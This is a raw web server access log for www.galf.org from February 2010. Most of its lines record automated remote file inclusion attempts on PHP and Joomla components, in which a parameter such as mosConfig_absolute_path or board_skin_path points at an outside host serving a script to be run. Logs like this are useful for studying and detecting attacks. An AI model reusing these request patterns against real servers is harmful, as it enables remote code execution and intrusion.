125.141.196.78 - - [15/Feb/2010:01:29:33 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:33 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:36 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:29:37 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:37 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:37 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:37 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:38 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:38 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:29:45 -0800] "GET /logs/access_091228.log/?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:29:45 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:29:45 -0800] "GET /?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:29:49 -0800] "GET /logs/access_100111.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:29:49 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:30:22 -0800] "GET /logs/access_100111.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:30:23 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:01:32:09 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:01:32:09 -0800] "GET /logs/access_090720.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:01:32:09 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [15/Feb/2010:01:32:23 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [15/Feb/2010:01:32:31 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:33:31 -0800] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:33:44 -0800] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:33:56 -0800] "GET /logs/access_091228.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:34:11 -0800] "GET /logs/access_091228.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:34:11 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:01:34:12 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:01:34:12 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:01:34:12 -0800] "GET /logs/access_090720.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:34:13 -0800] "GET /logs/access_090810.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:34:13 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:34:25 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:34:27 -0800] "GET /logs/access_090810.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:34:27 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:01:35:10 -0800] "GET /logs/access_090720.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:01:35:10 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:01:35:10 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:13 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:13 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:14 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:16 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:16 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:16 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:20 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:20 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:20 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:34 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:34 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:35:34 -0800] "GET /logs/access_090720.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:36 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:44 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:44 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:35:45 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:01:36:07 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:01:36:07 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:36:27 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:38:35 -0800] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:40 -0800] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:40 -0800] "GET /logs/access_091228.log%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:41 -0800] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:41 -0800] "GET /logs/access_091228.log%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:41 -0800] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:41 -0800] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:42 -0800] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:42 -0800] "GET /logs/access_091228.log%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:42 -0800] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:50 -0800] "GET /logs/access_091228.log%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:50 -0800] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:50 -0800] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:52 -0800] "GET /logs/access_091228.log%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:52 -0800] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:38:52 -0800] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:39:22 -0800] "GET /logs/access_091228.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:01:39:32 -0800] "GET /template.php?name=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:01:39:33 -0800] "GET /logs/access_091130.log%20%20/template.php?name=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:01:39:33 -0800] "GET /logs/template.php?name=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:01:39:46 -0800] "GET /logs/access_091130.log/template.php?name=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.123.9.114 - - [15/Feb/2010:01:40:23 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent" "www.galf.org"
65.55.106.162 - - [15/Feb/2010:01:40:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:40:51 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:40:51 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:40:51 -0800] "GET /write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:40:58 -0800] "GET /logs/access_090720.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:41:04 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:41:04 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:41:05 -0800] "GET /write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:41:06 -0800] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:42:00 -0800] "GET /logs/access_091228.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:43:04 -0800] "GET /logs/access_100125.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:43:05 -0800] "GET /logs/access_091214.log/?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:43:09 -0800] "GET /logs/access_091102.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:44:10 -0800] "GET /?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:44:10 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.105.125 - - [15/Feb/2010:01:44:10 -0800] "GET /logs/access_091214.log/?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:44:30 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:44:30 -0800] "GET /logs/access_091228.log%20%20//ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:44:30 -0800] "GET /ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:44:35 -0800] "GET /home.php?x=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:44:35 -0800] "GET /logs/home.php?x=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:44:36 -0800] "GET /logs/access_100104.log%20%20/home.php?x=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:44:43 -0800] "GET /logs/home.php?x=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:44:43 -0800] "GET /home.php?x=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:44:43 -0800] "GET /logs/access_100104.log%20%20/home.php?x=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:44:48 -0800] "GET /home.php?x=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:44:48 -0800] "GET /logs/access_100104.log%20%20/home.php?x=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:44:49 -0800] "GET /logs/home.php?x=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.202.10.25 - - [15/Feb/2010:01:45:32 -0800] "GET /logs/ HTTP/1.0" 200 4926 "http://www.google.fr/search?q=indexation+de+logs&ie=utf-8&oe=utf-8&aq=t&rls=com.ubuntu:en-US:official&client=firefox-a" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.galf.org"
82.127.104.67 - - [15/Feb/2010:01:45:33 -0800] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.galf.org"
91.207.6.18 - - [15/Feb/2010:01:46:42 -0800] "GET /?path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
91.207.6.18 - - [15/Feb/2010:01:46:42 -0800] "GET /logs/?path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:46:56 -0800] "GET //write_comment_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:46:56 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
